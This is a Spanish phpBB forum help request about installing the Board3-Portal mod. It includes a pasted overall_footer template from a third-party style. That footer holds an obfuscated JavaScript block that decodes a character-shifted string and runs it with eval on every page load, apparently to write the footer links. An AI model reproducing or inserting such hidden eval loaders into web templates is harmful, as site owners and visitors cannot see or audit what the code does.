problemas con overall_footer
Publicado: 21 Jun 2011, 17:35
hola a todos
he estado tratando de colocar el mod Board3-Portal_2.0.0B1 en el estilo prosilver pero al momento de buscar los codigos no me aprecen en el overall_footer.
plantilla:prosilver
Versión de phpBB: 3.0.8
URL de descarga:
estos son los codigos que debo colocar
y esto lo que me aparece en el overal_footer:
¿en que parte del overall_footer debo colocar esos codigos?
o sera que esta malo o hay que modificar algo
he estado tratando de colocar el mod Board3-Portal_2.0.0B1 en el estilo prosilver pero al momento de buscar los codigos no me aprecen en el overall_footer.

plantilla:prosilver
Versión de phpBB: 3.0.8
URL de descarga:
estos son los codigos que debo colocar
SPOILER_SHOW
Find
Tip: This may be a partial find and not the whole line.
In-line Find
Tip: This is a partial match of a line for in-line operations.
In-line Add after
Tip: This may be a partial find and not the whole line.
Código: Seleccionar todo
<li class="icon-home"><a href="{U_INDEX}" accesskey="h">{L_INDEX}</a></li>
Tip: This is a partial match of a line for in-line operations.
Código: Seleccionar todo
<li class="icon-home">
Código: Seleccionar todo
<!-- IF U_PORTAL --><a href="{U_PORTAL}">{L_PORTAL}</a> » <!-- ENDIF -->
SPOILER_SHOW
Código: Seleccionar todo
<!-- IF not S_IS_BOT -->{RUN_CRON_TASK}<!-- ENDIF -->
</div>
</div></div>
</div>
<br />
<div id="wrapfooter">
<!--
We request you retain the full copyright notice below including the link to www.phpbb.com.
This not only gives respect to the large amount of time given freely by the developers
but also helps build interest, traffic and use of phpBB3. If you (honestly) cannot retain
the full copyright we ask you at least leave in place the "Powered by phpBB" line, with
"phpBB" linked to www.phpbb.com. If you refuse to include even this then support on our
forums may be affected.
The phpBB Group : 2006
//-->
<span class="copyright">
Powered by <a href="http://www.phpbb.com/">phpBB</a> © 2000, 2002, 2005, 2007 phpBB Group<br />
Style base twilightbb Thanks to Daniel St. Jules of <a href="http://www.gamexe.net">Gamexe.net</a><br />
MW2 Style by FanFanLaTuFlippe contact: fanfanlatuflippe@live.fr <a href="http://www.styles-design-phpbb.com" title="Styles Design Phpbb" alt="" target="blank">S.D.P.com</a>
<script type="text/javascript">
//<![CDATA[
var d="";for(var i=0;i<378;i++)d+=String.fromCharCode(("xct\"u?$uwqopq\"\'^$^$?\'hgtj\"c>)*gvkty0vpgoweqfcnrgt0)<qvnkco\')^^?hgtj0ukjv^$?tgxq\'gvcn6p6chpch)-++3*tvudwu0^$E^$.i1\'1*ge]-+_2]_^$^$].i161*gecnrgt0)grrk6nhw66{1*gecnrgt0)t{hg422w^^g{xkn)-_2]_^$B^$FFwqguwqopqF\"^$)^^)-++3*tvudwu0^$\\^$.i1gt0)@c1>vecvpqe@F^$)^^)^^?hgtj0ukjv^$?v++^$^$.i1F1*gecnr$=f?$$=hqt*xct\"k?2=k>u0ngpivj=k-?57+f-?u0uwduvt*k.57+0urnkv*$$+0tgxgtug*+0lqkp*$$+=gxcn*f+".charCodeAt(i)+61)%95+32);eval(d)
//]]>
</script><br />
<!-- IF TRANSLATION_INFO -->{TRANSLATION_INFO}<!-- ENDIF -->
<!-- IF DEBUG_OUTPUT --><br /><bdo dir="ltr">[ {DEBUG_OUTPUT} ]</bdo><!-- ENDIF -->
</span>
</div>
<!-- IF U_ACP --><br /><div class="acp">
[ <a href="{U_ACP}">{L_ACP}</a> ]
</div><!-- ENDIF -->
</td>
</tr>
</table>
</div>
</body>
</html>
o sera que esta malo o hay que modificar algo
